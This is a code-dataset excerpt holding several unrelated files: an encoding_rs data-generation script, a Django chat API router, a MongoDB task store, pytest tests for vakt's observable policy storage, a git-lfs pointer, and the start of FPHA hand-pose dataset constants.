VariantEncoding::SingleByte(table, run_bmp_offset, run_byte_offset, run_length) => SingleByteEncoder::new(encoding, table, run_bmp_offset, run_byte_offset, run_length),
VariantEncoding::Utf8 => Utf8Encoder::new(encoding),
VariantEncoding::Gbk => Gb18030Encoder::new(encoding, false),
VariantEncoding::Gb18030 => Gb18030Encoder::new(encoding, true),
VariantEncoding::Big5 => Big5Encoder::new(encoding),
VariantEncoding::EucJp => EucJpEncoder::new(encoding),
VariantEncoding::Iso2022Jp => Iso2022JpEncoder::new(encoding),
VariantEncoding::ShiftJis => ShiftJisEncoder::new(encoding),
VariantEncoding::EucKr => EucKrEncoder::new(encoding),
VariantEncoding::UserDefined => UserDefinedEncoder::new(encoding),
VariantEncoding::Utf16Be | VariantEncoding::Replacement |
VariantEncoding::Utf16Le => unreachable!(),
}
}
pub fn is_single_byte(&self) -> bool {
match *self {
VariantEncoding::SingleByte(_, _, _, _) | VariantEncoding::UserDefined => true,
_ => false,
}
}
}
''')
variant_file.close()
(ffi_rs_begin, ffi_rs_end) = read_non_generated("../encoding_c/src/lib.rs")
ffi_file = open("../encoding_c/src/lib.rs", "w")
ffi_file.write(ffi_rs_begin)
ffi_file.write("""
// Instead, please regenerate using generate-encoding-data.py
/// The minimum length of buffers that may be passed to `encoding_name()`.
pub const ENCODING_NAME_MAX_LENGTH: usize = %d; // %s
""" % (longest_name_length, longest_name))
for name in preferred:
ffi_file.write('''/// The %s encoding.
#[no_mangle]
pub static %s_ENCODING: ConstEncoding = ConstEncoding(&%s_INIT);
''' % (to_dom_name(name), to_constant_name(name), to_constant_name(name)))
ffi_file.write(ffi_rs_end)
ffi_file.close()
(single_byte_rs_begin, single_byte_rs_end) = read_non_generated("src/single_byte.rs")
single_byte_file = open("src/single_byte.rs", "w")
single_byte_file.write(single_byte_rs_begin)
single_byte_file.write("""
// Instead, please regenerate using generate-encoding-data.py
#[test]
fn test_single_byte_decode() {""")
idx = 0
for name in preferred:
if name == u"ISO-8859-8-I":
continue;
if is_single_byte(name):
single_byte_file.write("""
decode_single_byte(%s, &data::SINGLE_BYTE_DATA.%s);""" % (to_constant_name(name), to_snake_name(name)))
idx += 1
if idx == 2:
single_byte_file.write("""
if cfg!(miri) {
// Miri is too slow
return;
}""")
single_byte_file.write("""
}
#[test]
fn test_single_byte_encode() {""")
idx = 0
for name in preferred:
if name == u"ISO-8859-8-I":
continue;
if is_single_byte(name):
single_byte_file.write("""
encode_single_byte(%s, &data::SINGLE_BYTE_DATA.%s);""" % (to_constant_name(name), to_snake_name(name)))
idx += 1
if idx == 2:
single_byte_file.write("""
if cfg!(miri) {
// Miri is too slow
return;
}""")
single_byte_file.write("""
}
""")
single_byte_file.write(single_byte_rs_end)
single_byte_file.close()
static_file = open("../encoding_c/include/encoding_rs_statics.h", "w")
static_file.write("""// Copyright Mozilla Foundation. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// https://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or https://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// THIS IS A GENERATED FILE. PLEASE DO NOT EDIT.
// Instead, please regenerate using generate-encoding-data.py
// This file is not meant to be included directly. Instead, encoding_rs.h
// includes this file.
#ifndef encoding_rs_statics_h_
#define encoding_rs_statics_h_
#ifndef ENCODING_RS_ENCODING
#define ENCODING_RS_ENCODING Encoding
#ifndef __cplusplus
typedef struct Encoding_ Encoding;
#endif
#endif
#ifndef ENCODING_RS_NOT_NULL_CONST_ENCODING_PTR
#define ENCODING_RS_NOT_NULL_CONST_ENCODING_PTR const ENCODING_RS_ENCODING*
#endif
#ifndef ENCODING_RS_ENCODER
#define ENCODING_RS_ENCODER Encoder
#ifndef __cplusplus
typedef struct Encoder_ Encoder;
#endif
#endif
#ifndef ENCODING_RS_DECODER
#define ENCODING_RS_DECODER Decoder
#ifndef __cplusplus
typedef struct Decoder_ Decoder;
#endif
#endif
#define INPUT_EMPTY 0
#define OUTPUT_FULL 0xFFFFFFFF
// %s
#define ENCODING_NAME_MAX_LENGTH %d
""" % (longest_name, longest_name_length))
for name in preferred:
static_file.write('''/// The %s encoding.
extern ENCODING_RS_NOT_NULL_CONST_ENCODING_PTR const %s_ENCODING;
''' % (to_dom_name(name), to_constant_name(name)))
static_file.write("""#endif // encoding_rs_statics_h_
""")
static_file.close()
(utf_8_rs_begin, utf_8_rs_end) = read_non_generated("src/utf_8.rs")
utf_8_file = open("src/utf_8.rs", "w")
utf_8_file.write(utf_8_rs_begin)
utf_8_file.write("""
// Instead, please regenerate using generate-encoding-data.py
pub static UTF8_DATA: Utf8Data = Utf8Data {
table: [
""")
for i in range(256):
combined = (1 << 2)
if i < 0x80 or i > 0xBF:
combined |= (1 << 3)
if i < 0xA0 or i > 0xBF:
combined |= (1 << 4)
if i < 0x80 or i > 0x9F:
combined |= (1 << 5)
if i < 0x90 or i > 0xBF:
combined |= (1 << 6)
if i < 0x80 or i > 0x8F:
combined |= (1 << 7)
utf_8_file.write("%d," % combined)
for i in range(128, 256):
lane = (1 << 2)
if i >= 0xC2 and i <= 0xDF:
lane = (1 << 3)
elif i == 0xE0:
lane = (1 << 4)
elif i >= 0xE1 and i <= 0xEC:
lane = (1 << 3)
elif i == 0xED:
lane = (1 << 5)
elif i >= 0xEE and i <= 0xEF:
lane = (1 << 3)
elif i == 0xF0:
lane = (1 << 6)
elif i >= 0xF1 and i <= 0xF3:
lane = (1 << 3)
elif i == 0xF4:
lane = (1 << 7)
utf_8_file.write("%d," % lane)
utf_8_file.write("""
],
};
""")
utf_8_file.write(utf_8_rs_end)
utf_8_file.close()
TEST_HEADER = '''Any copyright to the test code below this comment is dedicated to the
Public Domain. http://creativecommons.org/publicdomain/zero/1.0/
This is a generated file. Please do not edit.
Instead, please regenerate using generate-encoding-data.py
'''
index = indexes["jis0208"]
jis0208_in_file = open("src/test_data/jis0208_in.txt", "w")
jis0208_in_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
(lead, trail) = divmod(pointer, 94)
lead += 0xA1
trail += 0xA1
jis0208_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
jis0208_in_file.close()
jis0208_in_ref_file = open("src/test_data/jis0208_in_ref.txt", "w")
jis0208_in_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
jis0208_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
jis0208_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
jis0208_in_ref_file.close()
jis0208_out_file = open("src/test_data/jis0208_out.txt", "w")
jis0208_out_ref_file = open("src/test_data/jis0208_out_ref.txt", "w")
jis0208_out_file.write(TEST_HEADER)
jis0208_out_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
revised_pointer = pointer
if revised_pointer == 8644 or (revised_pointer >= 1207 and revised_pointer < 1220):
revised_pointer = index.index(code_point)
(lead, trail) = divmod(revised_pointer, 94)
lead += 0xA1
trail += 0xA1
jis0208_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
jis0208_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
jis0208_out_file.close()
jis0208_out_ref_file.close()
shift_jis_in_file = open("src/test_data/shift_jis_in.txt", "w")
shift_jis_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
shift_jis_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
shift_jis_in_file.close()
shift_jis_in_ref_file = open("src/test_data/shift_jis_in_ref.txt", "w")
shift_jis_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = 0xE000 - 8836 + pointer if pointer >= 8836 and pointer <= 10715 else index[pointer]
if code_point:
shift_jis_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 188
trail += 0x40 if trail < 0x3F else 0x41
if trail < 0x80:
shift_jis_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
shift_jis_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
shift_jis_in_ref_file.close()
shift_jis_out_file = open("src/test_data/shift_jis_out.txt", "w")
shift_jis_out_ref_file = open("src/test_data/shift_jis_out_ref.txt", "w")
shift_jis_out_file.write(TEST_HEADER)
shift_jis_out_ref_file.write(TEST_HEADER)
for pointer in range(0, 8272):
code_point = index[pointer]
if code_point:
revised_pointer = pointer
if revised_pointer >= 1207 and revised_pointer < 1220:
revised_pointer = index.index(code_point)
(lead, trail) = divmod(revised_pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
shift_jis_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
shift_jis_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
for pointer in range(8836, len(index)):
code_point = index[pointer]
if code_point:
revised_pointer = index.index(code_point)
if revised_pointer >= 8272 and revised_pointer < 8836:
revised_pointer = pointer
(lead, trail) = divmod(revised_pointer, 188)
lead += 0x81 if lead < 0x1F else 0xC1
trail += 0x40 if trail < 0x3F else 0x41
shift_jis_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
shift_jis_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
shift_jis_out_file.close()
shift_jis_out_ref_file.close()
iso_2022_jp_in_file = open("src/test_data/iso_2022_jp_in.txt", "w")
iso_2022_jp_in_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
(lead, trail) = divmod(pointer, 94)
lead += 0x21
trail += 0x21
iso_2022_jp_in_file.write("\x1B$B%s%s\x1B(B\n" % (chr(lead), chr(trail)))
iso_2022_jp_in_file.close()
iso_2022_jp_in_ref_file = open("src/test_data/iso_2022_jp_in_ref.txt", "w")
iso_2022_jp_in_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
iso_2022_jp_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
iso_2022_jp_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
iso_2022_jp_in_ref_file.close()
iso_2022_jp_out_file = open("src/test_data/iso_2022_jp_out.txt", "w")
iso_2022_jp_out_ref_file = open("src/test_data/iso_2022_jp_out_ref.txt", "w")
iso_2022_jp_out_file.write(TEST_HEADER)
iso_2022_jp_out_ref_file.write(TEST_HEADER)
for pointer in range(0, 94 * 94):
code_point = index[pointer]
if code_point:
revised_pointer = pointer
if revised_pointer == 8644 or (revised_pointer >= 1207 and revised_pointer < 1220):
revised_pointer = index.index(code_point)
(lead, trail) = divmod(revised_pointer, 94)
lead += 0x21
trail += 0x21
iso_2022_jp_out_ref_file.write("\x1B$B%s%s\x1B(B\n" % (chr(lead), chr(trail)))
iso_2022_jp_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
for i in xrange(len(half_width_index)):
code_point = i + 0xFF61
normalized_code_point = half_width_index[i]
pointer = index.index(normalized_code_point)
(lead, trail) = divmod(pointer, 94)
lead += 0x21
trail += 0x21
iso_2022_jp_out_ref_file.write("\x1B$B%s%s\x1B(B\n" % (chr(lead), chr(trail)))
iso_2022_jp_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
iso_2022_jp_out_file.close()
iso_2022_jp_out_ref_file.close()
index = indexes["euc-kr"]
euc_kr_in_file = open("src/test_data/euc_kr_in.txt", "w")
euc_kr_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x41
euc_kr_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
euc_kr_in_file.close()
euc_kr_in_ref_file = open("src/test_data/euc_kr_in_ref.txt", "w")
euc_kr_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
euc_kr_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 190
trail += 0x41
if trail < 0x80:
euc_kr_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
euc_kr_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
euc_kr_in_ref_file.close()
euc_kr_out_file = open("src/test_data/euc_kr_out.txt", "w")
euc_kr_out_ref_file = open("src/test_data/euc_kr_out_ref.txt", "w")
euc_kr_out_file.write(TEST_HEADER)
euc_kr_out_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x41
euc_kr_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
euc_kr_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
euc_kr_out_file.close()
euc_kr_out_ref_file.close()
index = indexes["gb18030"]
gb18030_in_file = open("src/test_data/gb18030_in.txt", "w")
gb18030_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x41
gb18030_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
gb18030_in_file.close()
gb18030_in_ref_file = open("src/test_data/gb18030_in_ref.txt", "w")
gb18030_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
gb18030_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 190
trail += 0x40 if trail < 0x3F else 0x41
if trail < 0x80:
gb18030_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
gb18030_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
gb18030_in_ref_file.close()
gb18030_out_file = open("src/test_data/gb18030_out.txt", "w")
gb18030_out_ref_file = open("src/test_data/gb18030_out_ref.txt", "w")
gb18030_out_file.write(TEST_HEADER)
gb18030_out_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
if pointer == 6555:
continue
code_point = index[pointer]
if code_point:
(lead, trail) = divmod(pointer, 190)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x41
gb18030_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
gb18030_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
gb18030_out_file.close()
gb18030_out_ref_file.close()
index = indexes["big5"]
big5_in_file = open("src/test_data/big5_in.txt", "w")
big5_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 157)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x62
big5_in_file.write("%s%s\n" % (chr(lead), chr(trail)))
big5_in_file.close()
big5_two_characters = {
1133: u"\u00CA\u0304",
1135: u"\u00CA\u030C",
1164: u"\u00EA\u0304",
1166: u"\u00EA\u030C",
}
big5_in_ref_file = open("src/test_data/big5_in_ref.txt", "w")
big5_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
if pointer in big5_two_characters.keys():
big5_in_ref_file.write((u"%s\n" % big5_two_characters[pointer]).encode("utf-8"))
continue
code_point = index[pointer]
if code_point:
big5_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
trail = pointer % 157
trail += 0x40 if trail < 0x3F else 0x62
if trail < 0x80:
big5_in_ref_file.write((u"\uFFFD%s\n" % unichr(trail)).encode("utf-8"))
else:
big5_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
big5_in_ref_file.close()
prefer_last = [
0x2550,
0x255E,
0x2561,
0x256A,
0x5341,
0x5345,
]
pointer_for_prefer_last = []
for code_point in prefer_last:
for i in xrange(len(index) - 1, -1, -1):
candidate = index[i]
if candidate == code_point:
pointer_for_prefer_last.append(i)
break
big5_out_file = open("src/test_data/big5_out.txt", "w")
big5_out_ref_file = open("src/test_data/big5_out_ref.txt", "w")
big5_out_file.write(TEST_HEADER)
big5_out_ref_file.write(TEST_HEADER)
for pointer in range(((0xA1 - 0x81) * 157), len(index)):
code_point = index[pointer]
if code_point:
if code_point in prefer_last:
if pointer != pointer_for_prefer_last[prefer_last.index(code_point)]:
continue
else:
if pointer != index.index(code_point):
continue
(lead, trail) = divmod(pointer, 157)
lead += 0x81
trail += 0x40 if trail < 0x3F else 0x62
big5_out_ref_file.write("%s%s\n" % (chr(lead), chr(trail)))
big5_out_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
big5_out_file.close()
big5_out_ref_file.close()
index = indexes["jis0212"]
jis0212_in_file = open("src/test_data/jis0212_in.txt", "w")
jis0212_in_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
(lead, trail) = divmod(pointer, 94)
lead += 0xA1
trail += 0xA1
jis0212_in_file.write("\x8F%s%s\n" % (chr(lead), chr(trail)))
jis0212_in_file.close()
jis0212_in_ref_file = open("src/test_data/jis0212_in_ref.txt", "w")
jis0212_in_ref_file.write(TEST_HEADER)
for pointer in range(0, len(index)):
code_point = index[pointer]
if code_point:
jis0212_in_ref_file.write((u"%s\n" % unichr(code_point)).encode("utf-8"))
else:
jis0212_in_ref_file.write(u"\uFFFD\n".encode("utf-8"))
jis0212_in_ref_file.close()
(codepage_begin, codepage_end) = read_non_generated("../codepage/src/lib.rs")
codepage_file = open("../codepage/src/lib.rs", "w")
codepage_file.write(codepage_begin)
codepage_file.write("""
// Instead, please regenerate using generate-encoding-data.py
/// Supported code page numbers in estimated order of usage frequency
static CODE_PAGES: [u16; %d] = [
""" % len(code_pages))
for code_page in code_pages:
codepage_file.write(" %d,\n" % code_page)
codepage_file.write("""];
/// Encodings corresponding to the code page numbers in the same order
static ENCODINGS: [&'static Encoding; %d] = [
""" % len(code_pages))
for code_page in code_pages:
name = encodings_by_code_page[code_page]
codepage_file.write(" &%s_INIT,\n" % to_constant_name(name))
codepage_file.write("""];
""")
codepage_file.write(codepage_end)
codepage_file.close()
(codepage_test_begin, codepage_test_end) = read_non_generated("../codepage/src/tests.rs")
codepage_test_file = open("../codepage/src/tests.rs", "w")
codepage_test_file.write(codepage_test_begin)
codepage_test_file.write("""
// Instead, please regenerate using generate-encoding-data.py
#[test]
fn test_to_encoding() {
assert_eq!(to_encoding(0), None);
""")
for code_page in code_pages:
codepage_test_file.write(" assert_eq!(to_encoding(%d), Some(%s));\n" % (code_page, to_constant_name(encodings_by_code_page[code_page])))
codepage_test_file.write("""}
#[test]
fn test_from_encoding() {
""")
for name in preferred:
if code_pages_by_encoding.has_key(name):
codepage_test_file.write(" assert_eq!(from_encoding(%s), Some(%d));\n" % (to_constant_name(name), code_pages_by_encoding[name]))
else:
codepage_test_file.write(" assert_eq!(from_encoding(%s), None);\n" % to_constant_name(name))
codepage_test_file.write("""}
""")
codepage_test_file.write(codepage_test_end)
codepage_test_file.close()
subprocess.call(["cargo", "fmt"])
| [
"[email protected]"
] | |
318b1eb3d3c2cefce03b58798d8e9617e20f6b8b | 2a4bb0307d903678c3b51d1e2c8b7a53ee4ae26e | /backend/chat/api/v1/urls.py | 99a41c839549f4bde6227190e323d88b69862120 | [] | no_license | crowdbotics-apps/came2mind-20661 | 37835754c6b3fae6920b3f43bd5e9e1b824548f6 | 5eaed44b4b116ab89f9ae5f5ce4e2f314ae33172 | refs/heads/master | 2022-12-24T08:45:31.081668 | 2020-09-25T03:15:03 | 2020-09-25T03:15:03 | 298,455,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .viewsets import (
MessageViewSet,
ThreadMemberViewSet,
MessageActionViewSet,
ThreadActionViewSet,
ForwardedMessageViewSet,
ThreadViewSet,
)
# DRF router for the chat API v1 endpoints. Each (prefix, viewset) pair
# below yields the standard RESTful routes under that prefix. Registration
# order is preserved from the original module.
router = DefaultRouter()
_ROUTES = (
    ("forwardedmessage", ForwardedMessageViewSet),
    ("thread", ThreadViewSet),
    ("threadaction", ThreadActionViewSet),
    ("messageaction", MessageActionViewSet),
    ("message", MessageViewSet),
    ("threadmember", ThreadMemberViewSet),
)
for prefix, viewset in _ROUTES:
    router.register(prefix, viewset)

urlpatterns = [
    path("", include(router.urls)),
]
| [
"[email protected]"
] | |
ec9e9967a9d35ecb9c137b87d2b0304e54b3bf9f | eefb06b0d8c8c98c1e9cfc4c3852d5c453eb5429 | /data/input/anchor/make-magic/core/store.py | 6c8c1ab79e867d22aa00a08806097d60a5d46324 | [] | no_license | bopopescu/pythonanalyzer | db839453bde13bf9157b76e54735f11c2262593a | 8390a0139137574ab237b3ff5fe8ea61e8a0b76b | refs/heads/master | 2022-11-22T02:13:52.949119 | 2019-05-07T18:42:52 | 2019-05-07T18:42:52 | 282,079,884 | 0 | 0 | null | 2020-07-23T23:46:09 | 2020-07-23T23:46:08 | null | UTF-8 | Python | false | false | 2,808 | py | #! /usr/bin/env python
'''persistant storage of state data
We need some way to keep track of Tasks that are being worked on,
the state of items etc. It would be even cooler if that data was
to hang around when the process was gone.
'''
try: import pymongo
except: pass # allow import where noone is using the MongoStore
import config
import random
class MongoStore(object):
    """Persistent store backed by MongoDB.

    Each task gets its own collection, named after the task uuid. Item
    documents carry a 'name' field; the single per-task metadata document
    is instead flagged with a 'metadata' field, which is how the two kinds
    of document are told apart in queries.
    """

    def __init__(self):
        self.connection = pymongo.Connection(config.mongodb_server, config.mongodb_port)
        self.db = self.connection[config.mongodb_database]

    def get_tasks(self):
        # Every non-system collection corresponds to one task uuid.
        names = self.db.collection_names()
        return [n for n in names if 'system.' not in n]

    def new_task(self, uuid, items, metadata=None):
        if metadata == None:
            metadata = {}
        # Tag the metadata document so it can be distinguished from items.
        metadata['uuid'] = uuid
        metadata['metadata'] = True
        collection = self.db[uuid]
        collection.create_index('name')
        collection.create_index('metadata')
        collection.insert(items)
        collection.insert(metadata)

    def _noid(self, item):
        # Strip mongo's internal '_id' key before handing documents back.
        if item is not None and '_id' in item:
            del item['_id']
        return item

    def item(self, uuid, name):
        '''get a specific item for a task'''
        found = self.db[uuid].find_one({'name': name})
        return self._noid(found)

    def items(self, uuid):
        '''get all the items for a task'''
        # Named documents that are not the metadata document.
        query = {'name': {'$exists': True}, 'metadata': {'$exists': False}}
        return [self._noid(doc) for doc in self.db[uuid].find(query)]

    def metadata(self, uuid):
        '''get metadata for a task'''
        found = self.db[uuid].find_one({'metadata': {'$exists': True}})
        return self._noid(found)

    def update_item(self, uuid, name, updatedict, existingstate={}):
        '''updates an item similar to dict.update()

        if 'existingdict' is supplied, the update will only succeed if
        the items in existingdict match what is in the item already

        returns the contents of the item after the attempt is made.
        It is up to the caller to check if the update worked or failed.
        '''
        selector = dict(existingstate)
        selector['name'] = name
        self.db[uuid].update(selector, {'$set': updatedict})
        return self.item(uuid, name)

    def update_metadata(self, uuid, updatedict, existingstate={}):
        '''updates a metadata similar to dict.update()

        if 'existingdict' is supplied, the update will only succeed if
        the items in existingdict match what is in the metadata already

        returns the contents of the metadata after the attempt is made.
        It is up to the caller to check if the update worked or failed.
        '''
        selector = dict(existingstate)
        selector['metadata'] = {'$exists': True}
        self.db[uuid].update(selector, {'$set': updatedict})
        return self.metadata(uuid)

    def delete_task(self, uuid):
        '''delete a task, all it's items, and all it's metadata

        This is not recoverable.
        '''
        self.db[uuid].drop()
# Define the default Store here
Store = MongoStore
| [
"[email protected]"
] | |
4ca0d26c31143eecceec45ee9e2ea01a0526ef94 | 19da8356b07108c640ca107729a183670829a694 | /tests/storage/test_observable.py | 6fc02760b8a477088fb6b63a3e5b6bb7a9068638 | [
"Apache-2.0"
] | permissive | kolotaev/vakt | 2ebbc59f7ece8a3ad27ee9e77b3a9cb62509df6b | 3a669d058b64c9c0aa75aa72745049d25635d292 | refs/heads/master | 2023-05-25T13:11:12.988351 | 2023-04-12T11:16:03 | 2023-04-12T11:16:03 | 115,222,029 | 154 | 27 | Apache-2.0 | 2023-05-22T21:37:17 | 2017-12-23T21:10:41 | Python | UTF-8 | Python | false | false | 3,548 | py | import pytest
from vakt.storage.memory import MemoryStorage
from vakt.storage.observable import ObservableMutationStorage
from ..helper import CountObserver
from vakt import Policy, Inquiry
class TestObservableMutationStorage:
    """Tests that ObservableMutationStorage mirrors the wrapped MemoryStorage
    and notifies registered listeners on mutating calls (add/update/delete)
    but never on read-only calls (get/retrieve_all/get_all/find_for_inquiry).
    The CountObserver's ``count`` records how many notifications were sent.
    """

    @pytest.fixture()
    def factory(self):
        # Fixture returns a factory function (not the objects themselves) so
        # each test can create a fresh (storage, backend, observer) triple.
        def objects_factory():
            mem = MemoryStorage()
            st = ObservableMutationStorage(mem)
            observer = CountObserver()
            st.add_listener(observer)
            return st, mem, observer
        return objects_factory

    def test_add(self, factory):
        # Each add() must reach the backend and fire exactly one notification.
        st, mem, observer = factory()
        p1 = Policy(1)
        p2 = Policy(2)
        p3 = Policy(3)
        st.add(p1)
        st.add(p2)
        assert 2 == observer.count
        assert 2 == len(list(mem.retrieve_all()))
        assert 2 == len(list(st.retrieve_all()))
        st.add(p3)
        assert 3 == observer.count

    def test_get(self, factory):
        # get() is read-only: the count stays at 1 (from the single add),
        # including for lookups of a missing uid.
        st, mem, observer = factory()
        p1 = Policy('a')
        st.add(p1)
        assert 'a' == st.get('a').uid
        assert 'a' == mem.get('a').uid
        assert 1 == observer.count
        assert None is st.get('b')
        assert None is mem.get('b')
        assert 1 == observer.count

    def test_update(self, factory):
        # update() mutates, so every call bumps the notification count.
        st, mem, observer = factory()
        p1 = Policy('a')
        st.add(p1)
        p1.uid = 'b'
        st.update(p1)
        assert 'b' == list(mem.retrieve_all())[0].uid
        assert 'b' == list(st.retrieve_all())[0].uid
        assert 2 == observer.count
        p1.uid = 'c'
        st.update(p1)
        assert 3 == observer.count

    def test_delete(self, factory):
        # delete() notifies even when the uid no longer exists (second call).
        st, mem, observer = factory()
        p1 = Policy('a')
        st.add(p1)
        st.delete('a')
        assert [] == list(mem.retrieve_all())
        assert [] == list(st.retrieve_all())
        assert 2 == observer.count
        st.delete('a')
        assert [] == list(mem.retrieve_all())
        assert [] == list(st.retrieve_all())
        assert 3 == observer.count

    def test_retrieve_all(self, factory):
        # retrieve_all() is read-only in all call forms (default, keyword
        # batch, positional batch): count stays at 1.
        st, mem, observer = factory()
        p1 = Policy('a')
        st.add(p1)
        assert 'a' == list(mem.retrieve_all())[0].uid
        assert 'a' == list(st.retrieve_all())[0].uid
        assert 1 == observer.count
        assert 'a' == list(mem.retrieve_all(batch=2))[0].uid
        assert 'a' == list(st.retrieve_all(batch=2))[0].uid
        assert 1 == observer.count
        assert 'a' == list(mem.retrieve_all(5))[0].uid
        assert 'a' == list(st.retrieve_all(5))[0].uid
        assert 1 == observer.count

    def test_get_all(self, factory):
        # get_all() is read-only regardless of limit/offset arguments.
        st, mem, observer = factory()
        p1 = Policy('a')
        st.add(p1)
        assert 'a' == list(mem.get_all(5, 0))[0].uid
        assert 'a' == list(st.get_all(5, 0))[0].uid
        assert 1 == observer.count
        st.get_all(9, 0)
        st.get_all(888, 0)
        assert 1 == observer.count

    def test_find_for_inquiry(self, factory):
        # find_for_inquiry() is read-only; result order is unspecified, so
        # both orderings of the two policies are accepted.
        st, mem, observer = factory()
        inq = Inquiry(action='get', subject='foo', resource='bar')
        p1 = Policy('a')
        p2 = Policy('b')
        st.add(p1)
        st.add(p2)
        mem_found = list(mem.find_for_inquiry(inq))
        assert [p1, p2] == mem_found or [p2, p1] == mem_found
        st_found = list(st.find_for_inquiry(inq))
        assert [p1, p2] == st_found or [p2, p1] == st_found
        assert 2 == observer.count
        st.find_for_inquiry(inq)
        st.find_for_inquiry(inq)
        assert 2 == observer.count
| [
"[email protected]"
] | |
2eda2a6491ee50990066f2822c92a82bbc2bf67d | 1fe8d4133981e53e88abf633046060b56fae883e | /venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py | a1937c921b8c52bf1875287a5e3e4aecfbfc8217 | [] | no_license | Akira331/flask-cifar10 | 6c49db8485038731ce67d23f0972b9574746c7a7 | 283e7a2867c77d4b6aba7aea9013bf241d35d76c | refs/heads/master | 2023-06-14T16:35:06.384755 | 2021-07-05T14:09:15 | 2021-07-05T14:09:15 | 382,864,970 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:31d32b42c854a00b62bce6763a16a669094ee5a52103e00e97a238c43ef7234c
size 894
| [
"[email protected]"
] | |
fb14339c19c7c98a958d8c1a2f148ae76f946893 | 6268a19db5d7806b3a91d6350ec2777b3e13cee6 | /old_stuff/code/mlcv-exp_01/src/utils/fpha.py | e9b04c766cd61753ea10d92891cc0009d77a9fe8 | [] | no_license | aaronlws95/phd_2019 | 3ae48b4936f039f369be3a40404292182768cf3f | 22ab0f5029b7d67d32421d06caaf3e8097a57772 | refs/heads/master | 2023-03-22T14:38:18.275184 | 2021-03-21T11:39:29 | 2021-03-21T11:39:29 | 186,387,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,871 | py | from pathlib import Path
import numpy as np
from src import ROOT
# ========================================================
# CONSTANTS
# ========================================================
# Original color-frame resolution of the FPHA dataset (pixels).
ORI_WIDTH = 1920
ORI_HEIGHT = 1080
# Index permutation for the 21 hand joints (used to reorder skeleton
# annotations; exact source/target joint layout not shown in this file —
# TODO confirm against the dataset loader).
REORDER_IDX = [0, 1, 6, 7, 8, 2, 9,
               10, 11, 3, 12, 13, 14, 4,
               15, 16, 17, 5, 18, 19, 20]
# 4x4 rigid extrinsic transform. As used by xyz2uvd_color below, it maps
# XYZ-space points into the color camera's coordinate frame (rotation in
